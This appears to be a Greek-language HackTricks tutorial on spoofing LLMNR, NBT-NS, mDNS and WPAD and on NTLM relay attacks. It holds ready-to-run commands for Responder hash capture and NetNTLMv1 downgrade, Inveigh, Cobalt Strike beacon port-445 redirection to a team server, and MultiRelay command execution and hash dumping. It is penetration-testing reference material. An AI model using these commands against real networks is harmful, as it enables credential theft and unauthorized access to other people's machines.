Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Υποστηρίξτε το HackTricks

Δικτυακά Πρωτόκολλα

Πρωτόκολλα Τοπικής Ανάλυσης Ονομάτων Χρηστών

  • LLMNR, NBT-NS και mDNS:

  • Η Microsoft και άλλα λειτουργικά συστήματα χρησιμοποιούν τα LLMNR και NBT-NS για την τοπική ανάλυση ονομάτων όταν αποτυγχάνει το DNS. Αντίστοιχα, τα συστήματα της Apple και του Linux χρησιμοποιούν το mDNS.

  • Αυτά τα πρωτόκολλα είναι ευάλωτα στην παρεμβολή και πλαστογράφηση λόγω της μη ελεγχόμενης, εκπομπής φύσης τους μέσω UDP.

  • Το Responder μπορεί να χρησιμοποιηθεί για να παριστάνει υπηρεσίες αποστέλλοντας πλαστές απαντήσεις σε υπολογιστές που ερωτούν αυτά τα πρωτόκολλα.

  • Περισσότερες πληροφορίες σχετικά με την παραστάση υπηρεσιών χρησιμοποιώντας το Responder μπορούν να βρεθούν εδώ.

Πρωτόκολλο Αυτόματης Ανακάλυψης Ιστού (WPAD)

  • Το WPAD επιτρέπει στους περιηγητές να ανακαλύπτουν αυτόματα τις ρυθμίσεις του διακομιστή μεσολάβησης.

  • Η ανακάλυψη διευκολύνεται μέσω DHCP, DNS, ή ανατροφοδότηση στα LLMNR και NBT-NS αν αποτύχει το DNS.

  • Το Responder μπορεί να αυτοματοποιήσει επιθέσεις WPAD, καθοδηγώντας τους πελάτες σε κακόβουλους διακομιστές WPAD.

Ο Responder για τη Δηλητηρίαση Πρωτοκόλλων

  • Ο Responder είναι ένα εργαλείο που χρησιμοποιείται για τη δηλητηρίαση των ερωτημάτων LLMNR, NBT-NS και mDNS, απαντώντας εκλεκτικά βάσει τύπων ερωτημάτων, κατευθυνόμενο κυρίως σε υπηρεσίες SMB.

  • Έρχεται προεγκατεστημένο στο Kali Linux, ρυθμίσιμο στο /etc/responder/Responder.conf.

  • Ο Responder εμφανίζει τα καταγεγραμμένα hashes στην οθόνη και τα αποθηκεύει στον κατάλογο /usr/share/responder/logs.

  • Υποστηρίζει τόσο IPv4 όσο και IPv6.

  • Η έκδοση του Responder για Windows είναι διαθέσιμη εδώ.

Εκτέλεση του Responder

  • Για να εκτελέσετε το Responder με τις προεπιλεγμένες ρυθμίσεις: responder -I <Διεπαφή>

  • Για πιο επιθετική ανίχνευση (με πιθανές παρενέργειες): responder -I <Διεπαφή> -P -r -v

  • Τεχνικές για την καταγραφή προκλήσεων/απαντήσεων NTLMv1 για ευκολότερη αποκρυπτογράφηση: responder -I <Διεπαφή> --lm --disable-ess

  • Η παραστάση του WPAD μπορεί να ενεργοποιηθεί με: responder -I <Διεπαφή> --wpad

  • Οι αιτήσεις NetBIOS μπορούν να επιλυθούν στη διεύθυνση IP του επιτιθέμενου, και μπορεί να δημιουργηθεί ένας διακομιστής εξουσιοδότησης: responder.py -I <διεπαφή> -Pv

Δηλητηρίαση DHCP με το Responder

  • Η πλαστογράφηση απαντήσεων DHCP μπορεί να δηλητηριάσει μόνιμα τις πληροφορίες δρομολόγησης ενός θύματος, προσφέροντας μια πιο αόρατη εναλλακτική λύση στη δηλητηρίαση ARP.

  • Απαιτεί ακριβή γνώση της δικτυακής διαμόρφωσης του στόχου.

  • Εκτέλεση της επίθεσης: ./Responder.py -I eth0 -Pdv

  • Αυτή η μέθοδος μπορεί να αιχμαλωτίσει αποτελεσματικά hashes NTLMv1/2, αλλά απαιτεί προσεκτική χειραγώγηση για να αποφευχθεί η διαταραχή του δικτύου.

Καταγραφή Διαπιστευτηρίων με το Responder

  • Ο Responder θα παριστάνει υπηρεσίες χρησιμοποιώντας τα παραπάνω αναφερόμενα πρωτόκολλα, καταγράφοντας διαπιστευτήρια (συνήθως πρόκληση/απάντηση NTLMv2) όταν ένας χρήστης προσπαθεί να πιστοποιηθεί εναντίον των πλαστογραφημένων υπηρεσιών.

  • Μπορούν να γίνουν προσπάθειες για υποβάθμιση σε NetNTLMv1 ή απενεργοποίηση του ESS για ευκολότερη αποκρυπτογράφηση διαπιστευτηρίων.

Είναι ζωτικής σημασίας να σημειώσουμε ότι η χρήση αυτών των τεχνικών πρέπει να γίνεται νόμιμα και ηθικά, εξασφαλίζοντας την κατάλληλη εξουσιοδότηση και αποφεύγοντας τη διαταραχή ή την μη εξουσιοδοτημένη πρόσβαση.

Inveigh

Το Inveigh είναι ένα εργαλείο για δοκιμαστές διείσδυσης και ομάδες Red Team, σχεδιασμένο για συστήματα Windows. Προσφέρει λειτουργίες παρόμοιες με το Responder, εκτελώντας πλαστογράφηση και επιθέσεις man-in-the-middle. Το εργαλείο έχει εξελιχθεί από ένα σενάριο PowerShell σε ένα δυαδικό αρχείο C#, με τα Inveigh και InveighZero ως τις κύριες εκδόσεις. Λεπτομερείς παράμετροι και οδηγίες μπορούν να βρεθούν στο wiki.

Το Inveigh μπορεί να λειτουργήσει μέσω PowerShell:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ή εκτελείται ως δυαδικό αρχείο C#:

Inveigh.exe

Επίθεση NTLM Relay

Αυτή η επίθεση εκμεταλλεύεται τις συνεδρίες ελέγχου ταυτότητας SMB για πρόσβαση σε έναν στόχο υπολογιστή, παρέχοντας ένα κέλυφος συστήματος σε περίπτωση επιτυχίας. Βασικές προϋποθέσεις περιλαμβάνουν:

  • Ο χρήστης που πιστοποιείται πρέπει να έχει πρόσβαση Διαχειριστή τοπικά στον υπολογιστή προώθησης.

  • Η υπογραφή SMB πρέπει να είναι απενεργοποιημένη.

Προώθηση και Σήραγγα Θύρας 445

Σε περιπτώσεις όπου δεν είναι εφικτή η άμεση εισαγωγή στο δίκτυο, η κίνηση στη θύρα 445 πρέπει να προωθηθεί και να τουνελιστεί. Εργαλεία όπως το PortBender βοηθούν στην ανακατεύθυνση της κίνησης στη θύρα 445 σε μια άλλη θύρα, το οποίο είναι απαραίτητο όταν η πρόσβαση Διαχειριστή είναι διαθέσιμη για τη φόρτωση οδηγών.

Ρύθμιση και λειτουργία του PortBender στο Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Άλλα Εργαλεία για Επίθεση Ανακατεύθυνσης NTLM

  • Metasploit: Ρύθμιση με διακομιστές μεσολάβησης, τοπικές και απομακρυσμένες λεπτομέρειες του κεντρικού υπολογιστή.

  • smbrelayx: Ένα σενάριο Python για την ανακατεύθυνση συνεδριών SMB και την εκτέλεση εντολών ή την ανάπτυξη παγίδων.

  • MultiRelay: Ένα εργαλείο από τη σουίτα Responder για την ανακατεύθυνση συγκεκριμένων χρηστών ή όλων των χρηστών, την εκτέλεση εντολών ή την απόρριψη κατακερματισμών.

Κάθε εργαλείο μπορεί να ρυθμιστεί για λειτουργία μέσω ενός διακομιστή μεσολάβησης SOCKS εάν είναι απαραίτητο, επιτρέποντας επιθέσεις ακόμη και με έμμεση πρόσβαση στο δίκτυο.

Λειτουργία MultiRelay

Το MultiRelay εκτελείται από τον φάκελο /usr/share/responder/tools, εστιάζοντας σε συγκεκριμένες διευθύνσεις IP ή χρήστες.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Εξαναγκασμός Συνδέσεων NTLM

Στα Windows μπορείτε να εξαναγκάσετε ορισμένους προνομιούχους λογαριασμούς να πιστοποιηθούν σε αυθαίρετες μηχανές. Διαβάστε την παρακάτω σελίδα για να μάθετε πώς:

Force NTLM Privileged Authentication

Αναφορές

Υποστηρίξτε το HackTricks

Last updated